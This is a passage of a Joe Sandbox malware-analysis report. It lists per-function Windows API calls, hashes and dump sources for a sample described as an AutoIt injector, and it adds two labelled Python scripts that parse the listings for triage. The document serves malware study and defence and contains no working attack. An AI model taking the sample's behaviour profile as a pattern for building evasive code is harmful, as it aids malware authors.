                                                                                                                                                      • _wcslen.LIBCMT ref: 005A6E36
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005A6F93
                                                                                                                                                      • CoCreateInstance.OLE32(005D0CC4,00000000,00000001,005D0B34,?), ref: 005A6FAA
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005A722E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                      • String ID: .lnk
                                                                                                                                                      • API String ID: 886957087-24824748
                                                                                                                                                      • Opcode ID: a335823624be9973d2fc6a775f0ebc650495c49706f019ae9259fcb4f10b8f00
                                                                                                                                                      • Instruction ID: a8a2fe7a00c046e1224a7ec1c77ce7d5d1c3c4bfe33009bb0f0da850319ea1bc
                                                                                                                                                      • Opcode Fuzzy Hash: a335823624be9973d2fc6a775f0ebc650495c49706f019ae9259fcb4f10b8f00
                                                                                                                                                      • Instruction Fuzzy Hash: 5FD12571608202AFD304EF24C885A6BBBE8FF99704F44496DF5958B2A1DB71ED05CB92
                                                                                                                                                      APIs
                                                                                                                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 005B2C45
                                                                                                                                                        • Part of subcall function 005AEE49: GetWindowRect.USER32(?,?), ref: 005AEE61
                                                                                                                                                      • GetDesktopWindow.USER32 ref: 005B2C6F
                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 005B2C76
                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 005B2CB2
                                                                                                                                                      • GetCursorPos.USER32(?), ref: 005B2CDE
                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005B2D3C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2387181109-0
                                                                                                                                                      • Opcode ID: 9fe83f975267e9f9d15eeb2b2165bc4a373c2c3e462905d1ff1fc701b04e7dff
                                                                                                                                                      • Instruction ID: ecec5388e72ce7f7f1e472c703594e27b4d9f7a9b174f989ea0f19a16281e5e5
                                                                                                                                                      • Opcode Fuzzy Hash: 9fe83f975267e9f9d15eeb2b2165bc4a373c2c3e462905d1ff1fc701b04e7dff
                                                                                                                                                      • Instruction Fuzzy Hash: 3D31B072505316AFD720DF14C849FAABBA9FBC8354F000929F599D7181D730E948CBA2
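                                                                                                                                                      Added example (not part of the Joe Sandbox report or its IDA plugin): a small Python parser for the "APIs" listings in the function blocks above, plus a reconstruction of how the "API ID" line appears to be derived from those listings. The rule implemented in api_id() (one CamelCase token per word of each API name, tokens shorter than four characters dropped, tokens counted across the block including "Part of subcall function" lines, grouped by count with groups separated by "$" and ordered alphabetically inside a group) is inferred from the IDs printed on this page and checked against the registry, Variant and mouse_event blocks; it is an assumption about the tool, not documented behaviour. The "API String ID" hash is not reproduced. The sample input is copied from those three blocks.

```python
"""Parse Joe Sandbox 'APIs' function blocks and rebuild their 'API ID'.

Added example, not part of the report or the Joe Sandbox IDA plugin. The
API ID rule in api_id() is inferred from the IDs on this page (assumption).
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# One call line: optional "Part of subcall function ADDR:" prefix, then
# Api.MODULE, optional "(args)", optional ",", then "ref: ADDR".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[A-Za-z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# A leading lowercase/underscore name is one token (_wcslen, mouse_event);
# otherwise one token per CamelCase word (MultiByteToWideChar -> 5 words).
TOKEN_RE = re.compile(r"^[a-z_][a-z0-9_]*|[A-Z][a-z0-9]*")
MIN_TOKEN_LEN = 4  # inferred: drops Get, Reg, Key, Co, Sys, Rtl, W, Ex, To


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                   # call-site address
    subcall_of: Optional[int]  # callee address when listed as a subcall


def parse_calls(text: str) -> List[ApiCall]:
    """Return call records in listing order; non-call lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16), sub))
    return calls


def api_tokens(api: str) -> List[str]:
    return [t for t in TOKEN_RE.findall(api) if len(t) >= MIN_TOKEN_LEN]


def api_id(calls: List[ApiCall]) -> str:
    """Rebuild the 'API ID' string: tokens counted over all listed calls
    (subcalls included), grouped by count (highest first), ASCII-sorted
    inside a group, groups joined with '$'.  Rule inferred from this page."""
    counts = Counter(t for c in calls for t in api_tokens(c.api))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n]))
                    for n in sorted(by_count, reverse=True))


def has_sequence(calls: List[ApiCall], apis: List[str]) -> bool:
    """True if the APIs occur in this order among the function's own calls.
    Subcall lines are excluded: their ref addresses belong to the callee."""
    own = [c.api for c in calls if c.subcall_of is None]
    pos = 0
    for wanted in apis:
        while pos < len(own) and own[pos] != wanted:
            pos += 1
        if pos == len(own):
            return False
        pos += 1
    return True


# Sample input copied from three function blocks of this report.
REGISTRY_BLOCK = """
  • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
  • Part of subcall function 005BD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005BC00D,?,?), ref: 005BD314
  • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD350
  • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3C7
  • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3FD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BC629
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005BC684
• RegCloseKey.ADVAPI32(00000000), ref: 005BC6C9
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 005BC6F8
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 005BC752
• RegCloseKey.ADVAPI32(?), ref: 005BC75E
"""
VARIANT_BLOCK = """
• VariantInit.OLEAUT32(00000035), ref: 00590049
• SysAllocString.OLEAUT32(00000000), ref: 005900F0
• VariantCopy.OLEAUT32(005902F4,00000000), ref: 00590119
• VariantClear.OLEAUT32(005902F4), ref: 0059013D
• VariantCopy.OLEAUT32(005902F4,00000000), ref: 00590141
• VariantClear.OLEAUT32(?), ref: 0059014B
"""
MOUSE_BLOCK = """
• GetForegroundWindow.USER32(?,?,00000000), ref: 005B2C45
  • Part of subcall function 005AEE49: GetWindowRect.USER32(?,?), ref: 005AEE61
• GetDesktopWindow.USER32 ref: 005B2C6F
• GetWindowRect.USER32(00000000), ref: 005B2C76
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 005B2CB2
• GetCursorPos.USER32(?), ref: 005B2CDE
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 005B2D3C
"""

if __name__ == "__main__":
    for name, block in [("registry", REGISTRY_BLOCK), ("variant", VARIANT_BLOCK),
                        ("mouse", MOUSE_BLOCK)]:
        calls = parse_calls(block)
        print(f"{name}: {len(calls)} calls, API ID = {api_id(calls)}")
    print("registry block enumerates values:",
          has_sequence(parse_calls(REGISTRY_BLOCK),
                       ["RegOpenKeyExW", "RegEnumValueW", "RegCloseKey"]))
```

                                                                                                                                                      Once the listings are structured, a block like the registry one can be queried for behaviour (open, enumerate values, close) instead of being read by eye, and the rebuilt API ID can be used to group the hundreds of function blocks in this report by their import profile. Two caveats: the "ref" address of a "Part of subcall function" line belongs to the callee, so has_sequence() ignores those lines, and the token rule has only been checked against the IDs visible on this page; names with consecutive capitals or a lowercase prefix followed by CamelCase may tokenise differently.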
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00535558,?,?,00574B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0053559E
                                                                                                                                                      • _wcslen.LIBCMT ref: 005A61D5
                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 005A62EF
                                                                                                                                                      • CoCreateInstance.OLE32(005D0CC4,00000000,00000001,005D0B34,?), ref: 005A6308
                                                                                                                                                      • CoUninitialize.OLE32 ref: 005A6326
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                      • String ID: .lnk
                                                                                                                                                      • API String ID: 3172280962-24824748
                                                                                                                                                      • Opcode ID: 9a1df1e1ff75bb70f433b7c165b0a36624675cea8961390f59d987743f827d31
                                                                                                                                                      • Instruction ID: 3c242aad5aa2d0cdb291458ef039a438e3758dd81edc9fc6ea368d6a926f6c71
                                                                                                                                                      • Opcode Fuzzy Hash: 9a1df1e1ff75bb70f433b7c165b0a36624675cea8961390f59d987743f827d31
                                                                                                                                                      • Instruction Fuzzy Hash: F7D121756042129FCB14DF24C494A2EBBE6FF8A714F188859F8869B361CB31EC45CB92
                                                                                                                                                      APIs
                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0059210F
                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 0059211B
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00592124
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0059212C
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00592135
                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0059213C
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                      • Opcode ID: e58f41d78c47b0563de7dc3062cbff83b2a2d86adee87a2c96d13063b840d7d9
                                                                                                                                                      • Instruction ID: 54c74faa4e490ad95c6c431b81c68ff1cb87b775b980d5ec99d26758ab7112d9
                                                                                                                                                      • Opcode Fuzzy Hash: e58f41d78c47b0563de7dc3062cbff83b2a2d86adee87a2c96d13063b840d7d9
                                                                                                                                                      • Instruction Fuzzy Hash: A7E0C276004901BFDB011BA2ED0CD0ABF79FB69722B104634F225C2070CB329426EB60
                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 005C6C41
                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 005C6C74
                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 005C6CE1
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                                                      • String ID: Hb
                                                                                                                                                      • API String ID: 3880355969-1270690246
                                                                                                                                                      • Opcode ID: f6ad260377c6f5bd7e6ba103a299b5fcb2b5221b334ee65ef74ce7b103739529
                                                                                                                                                      • Instruction ID: b136a8da2807758f6a2270f94c33edf86d7e0908503f422b93edae031788ab02
                                                                                                                                                      • Opcode Fuzzy Hash: f6ad260377c6f5bd7e6ba103a299b5fcb2b5221b334ee65ef74ce7b103739529
                                                                                                                                                      • Instruction Fuzzy Hash: BF510C74A00609AFCF15DF94C984EAE7BB6FF55360F10816DF9659B2A0D730AE81CB90
                                                                                                                                                      APIs
                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0059CAC6
                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 0059CB0C
                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00602990,pb), ref: 0059CB55
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                                                      • String ID: 0$pb
                                                                                                                                                      • API String ID: 135850232-3053193360
                                                                                                                                                      • Opcode ID: 2bfd9235057efdacd062b51d53c487147814b38cc7ab26c3b6fd556b151f3f4d
                                                                                                                                                      • Instruction ID: e88e568092468552e18a82da9070d4750341afa18443def04e7bd41db06b49fa
                                                                                                                                                      • Opcode Fuzzy Hash: 2bfd9235057efdacd062b51d53c487147814b38cc7ab26c3b6fd556b151f3f4d
                                                                                                                                                      • Instruction Fuzzy Hash: 6B418E702053429FDB20DF28C846F1ABFE5BF95324F14466DF9A597291DB70A904CBA2
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
                                                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005926F6
                                                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00592709
                                                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00592739
                                                                                                                                                        • Part of subcall function 005384B7: _wcslen.LIBCMT ref: 005384CA
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$_wcslen$ClassName
                                                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                                                      • API String ID: 2081771294-1403004172
                                                                                                                                                      • Opcode ID: 8f49f626e4dc711a441486f678c39eb62de58be96d077c3b78de60a4e6277ace
                                                                                                                                                      • Instruction ID: eb7f127867d412ecbd5afbdba9de28f01b26f97e0f12da1f17b80cfd6081a1be
                                                                                                                                                      • Opcode Fuzzy Hash: 8f49f626e4dc711a441486f678c39eb62de58be96d077c3b78de60a4e6277ace
                                                                                                                                                      • Instruction Fuzzy Hash: 2921E171900109BFDF14ABA4DC8ADFEBFB8FF91750F144519F511A72E1CB38490A9A20
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 0053633E
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00536350
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536362
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                      • API String ID: 145871493-3689287502
                                                                                                                                                      • Opcode ID: 893aa68b09f978225c2aad065d695d609c8fa3dd52cdc0bccc91f9086d2f6acd
                                                                                                                                                      • Instruction ID: 40dc7a80251c36b6b10097850fb661f94924a3075d1251a91233bf88cb1261f7
                                                                                                                                                      • Opcode Fuzzy Hash: 893aa68b09f978225c2aad065d695d609c8fa3dd52cdc0bccc91f9086d2f6acd
                                                                                                                                                      • Instruction Fuzzy Hash: 14E08632601F212FD21127156C08F6BAB28BF91B13B094029F904D3140DB64CC05C4F0
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?,005754C3,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536304
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00536316
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,005754C3,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536329
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                      • API String ID: 145871493-1355242751
                                                                                                                                                      • Opcode ID: 0cbf470d247ff3fa44c89499e13c806e646e081edb8c2c09e54c41d267fa0184
                                                                                                                                                      • Instruction ID: 8b68ac9a80396cffb07906b5f73c4d6b38e6d19f7a830fd90000df9d80afa5df
                                                                                                                                                      • Opcode Fuzzy Hash: 0cbf470d247ff3fa44c89499e13c806e646e081edb8c2c09e54c41d267fa0184
                                                                                                                                                      • Instruction Fuzzy Hash: 6DD01235652A216FC2222725EC18D9F7F24FE85B11749443DB904E3128CF64CD05D5F0
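The two records above resolve Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection through LoadLibraryA/GetProcAddress instead of importing them. That keeps the image loadable where the export is missing, and in a 32-bit image on x64 Windows the pair brackets some operation with file-system redirection switched off, so paths under System32 reach the native directory rather than SysWOW64. On its own this is not an indicator: installers and the AutoIt runtime do the same, and while the report's signatures call the sample an AutoIt injector, the report does not name the module at 00530000. It is worth recording in triage together with what the bracketed code does. The script below is an added example, not code from the report or from Joe Security. It parses "APIs" lines in exactly the form shown on this page (the sample lines are copied from the records above and from the OpenProcess record that follows), decodes the SendMessageW message numbers and the OpenProcess access mask using the winuser.h and winnt.h constants, and flags late-bound Wow64 functions. Apart from those Windows constants, every name in it is the example's own.

```python
"""Triage helper for the 'APIs' lines of a Joe Sandbox function record.

Added example: not code from the report or from Joe Security. It parses lines
in the exact form shown on this page and decodes a few numeric arguments.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# One 'APIs' line: optional subcall prefix, Func.MODULE(args), ref: address.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# ListBox messages from winuser.h; 0x188-0x18A are the ones seen on this page.
LB_MESSAGES = {0x188: "LB_GETCURSEL", 0x189: "LB_GETTEXT", 0x18A: "LB_GETTEXTLEN"}
# Process access rights from winnt.h (subset; unknown bits are reported as hex).
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
# Exports whose late binding via GetProcAddress deserves a note in triage.
WATCHED = {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection"}

# Constructed sample: lines copied from the function records on this page.
SAMPLE = """\
• LoadLibraryA.KERNEL32(kernel32.dll,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 0053633E
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00536350
• FreeLibrary.KERNEL32(00000000,?,?,0053637F,?,?,005360AA,?,00000001,?,?,00000000), ref: 00536362
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00536316
  • Part of subcall function 00594536: GetClassNameW.USER32(?,?,000000FF), ref: 00594559
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005926F6
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00592709
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00592739
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005BAD94
  • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
"""


@dataclass
class Call:
    func: str
    module: str
    args: List[str]      # raw argument text; '?' means the sandbox could not recover it
    ref: int             # address of the call instruction
    subcall: Optional[int] = None  # set when the line is a 'Part of subcall' entry


def _hex(arg: str) -> Optional[int]:
    """Interpret an eight-digit argument as a hex value; anything else is unknown."""
    return int(arg, 16) if HEX8.match(arg) else None


def parse_api_lines(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(Call(m.group("func"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def decode_access_mask(mask: int) -> List[str]:
    """Expand an OpenProcess desired-access mask into right names, low bit first."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    rest = mask & ~sum(PROCESS_RIGHTS)
    if rest:
        names.append(f"0x{rest:X}")
    return names


def annotate(call: Call) -> Optional[str]:
    """Human-readable note for calls whose numeric arguments encode something."""
    if call.func == "SendMessageW" and len(call.args) > 1:
        msg = _hex(call.args[1])
        if msg is not None:
            return LB_MESSAGES.get(msg, f"WM_0x{msg:04X}")
    if call.func == "OpenProcess" and call.args:
        mask = _hex(call.args[0])
        if mask is not None:
            return "|".join(decode_access_mask(mask))
    return None


def find_dynamic_resolution(calls: List[Call]) -> Dict[str, int]:
    """Map each watched export resolved through GetProcAddress to its call site."""
    found: Dict[str, int] = {}
    for c in calls:
        if c.func == "GetProcAddress" and len(c.args) > 1 and c.args[1] in WATCHED:
            found[c.args[1]] = c.ref
    return found


def summarize(text: str) -> List[str]:
    calls = parse_api_lines(text)
    out = [f"{c.ref:08X} {c.func}: {annotate(c)}" for c in calls if annotate(c)]
    dyn = find_dynamic_resolution(calls)
    out += [f"{ref:08X} GetProcAddress resolves {name} at runtime" for name, ref in dyn.items()]
    if WATCHED <= set(dyn):
        out.append("disable/revert pair present: some file or process operation runs "
                   "with WoW64 file-system redirection off")
    return out


if __name__ == "__main__":
    for line in summarize(SAMPLE):
        print(line)
```

The decoded values are the reason the SendMessageW triple reads as ordinary ListBox handling (LB_GETCURSEL, LB_GETTEXTLEN, LB_GETTEXT with the ComboBox/ListBox class-name check) and the OpenProcess mask reads as PROCESS_VM_READ|PROCESS_QUERY_INFORMATION, which is what GetProcessIoCounters needs and no more; the script reports unknown bits in hex so a mask with PROCESS_VM_WRITE or PROCESS_CREATE_THREAD stands out when the same parser is run over the injection records elsewhere in this report.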
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 005BAD86
                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005BAD94
                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 005BADC7
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 005BAF9C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3488606520-0
                                                                                                                                                      • Opcode ID: 47888ec9d5e4253b8b38484c0691bf06999780a66f7c87d1173351f86d0be2d1
                                                                                                                                                      • Instruction ID: e4fbeb3ad020fbf86c58f1efeaf064465ac03ca24a16923b36f24a5b64ccacc2
                                                                                                                                                      • Opcode Fuzzy Hash: 47888ec9d5e4253b8b38484c0691bf06999780a66f7c87d1173351f86d0be2d1
                                                                                                                                                      • Instruction Fuzzy Hash: 3DA19BB1604701AFD720DF24C88AB6ABBE5BF84714F14885DF5999B2D2DB70EC41CB92
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0053B25F: _wcslen.LIBCMT ref: 0053B269
                                                                                                                                                        • Part of subcall function 005BD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005BC00D,?,?), ref: 005BD314
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD350
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3C7
                                                                                                                                                        • Part of subcall function 005BD2F7: _wcslen.LIBCMT ref: 005BD3FD
                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005BC404
                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005BC45F
                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005BC4C2
                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 005BC505
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 005BC512
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000008.00000002.1659648520.0000000000531000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00530000, based on PE: true
                                                                                                                                                      • Associated: 00000008.00000002.1659626040.0000000000530000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659709442.00000000005F3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659762900.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      • Associated: 00000008.00000002.1659790564.0000000000605000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_8_2_530000_oxhvi.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 826366716-0
                                                                                                                                                      • Opcode ID: eb4fa606e2b137daa7ed82ea86851f7c668d421a8b3887ad23f50ad5876b8028
                                                                                                                                                      • Instruction ID: 57d0e18fed8022e50a97c435659996b83d7f389ea179063025a8df5dd972f616
                                                                                                                                                      • Opcode Fuzzy Hash: eb4fa606e2b137daa7ed82ea86851f7c668d421a8b3887ad23f50ad5876b8028
                                                                                                                                                      • Instruction Fuzzy Hash: 67615D31208241AFD714DF24C495E6ABFE5BF84308F54899CF55A8B2A2DB31FD45CB92
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0059E60C: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0059D6E2,?), ref: 0059E629
                                                                                                                                                        • Part of subcall function 0059E60C: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0059D6E2,?), ref: 0059E642
                                                                                                                                                        • Part of subcall function 0059E9C5: GetFileAttributesW.KERNELBASE(?,0059D755), ref: 0059E9C6
